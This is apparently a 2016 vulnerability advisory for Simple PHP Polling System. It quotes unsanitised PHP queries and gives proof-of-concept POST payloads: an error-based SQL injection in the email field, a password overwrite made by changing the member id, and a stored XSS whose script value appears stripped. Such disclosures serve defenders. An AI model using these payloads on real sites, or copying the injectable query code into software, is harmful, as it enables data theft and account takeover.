Exploit Title : Multiple Vulnerabilities in Simple PHP Polling System. Author : WICS Date : 05-Jan-2016 Software Link : http://sourceforge.net/projects/pollingsystem/ # Overview : Simple PHP Polling System helps organizations to make polls of different types of positions with a number of candidates under each position. This vulnerable package ha 5869+ downlaods till the date. Multiple vulnerabilities ( SQL insertion injection, Persistent Cross Site Scripting, Password Reset. ) 1. SQL injection : Sql injetion exist in following pages : -------------- a) manage-profile.php : In manage-profile.php there is no filteration or validation for user supplied data, on parameter " $_POST['email'] line no.33 -> $myEmail = $_POST['email']; ... ... ... line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" ) or die( mysql_error() ); an attacker can inject post parameter email to perform SQL Injecton attack. b) registeracc.php : In registeracc.php there is no filteration or validation for user supplied data, on parameter " $_POST['email'] line no.26 -> $myEmail = $_POST['email']; ... ... ... line no 30 -> $sql = mysql_query( "INSERT INTO tbMembers(first_name, last_name, email, password) VALUES ('$myFirstName','$myLastName', '$myEmail', '$newpass')" ) or die( mysql_error() ); an attacker can inject post parameter email to perform SQL Injecton attack. # PoC : firstname=WICS&lastname=tester&email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or'&password=password&ConfirmPassword=password&submit=Register+Account 2. Password reset : --------------- In manage-profile.php page, line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" ) By changing the value of 'member_id' attacker can reset the user details including his password. steps to reproduce : 1. Login into your account. 2. Navagate to Manage My Profile. Request will be something like - http://localhost/vote/manage-profile.php?id= somenumber here the value of id will be id of victim, and value of rest of the post parameter will set by attacker. # PoC : firstname=Attacker&lastname=LastNmae&email=Tester%40wics.com&password=adminadmin&ConfirmPassword=adminadmin&update=Update+Profile 3. Persistent Cross site Scripting : In 'registeracc.php' and 'manage-profile.php' page the value of post parameter ' email ' supplied by user is not being ----------------------------------- validated .this leaves application vulnerable to persistent Cross Site Scripting. # PoC : firstname=WICS&lastname=wics&email=&password=admin&ConfirmPassword=admin&update=Update+Profile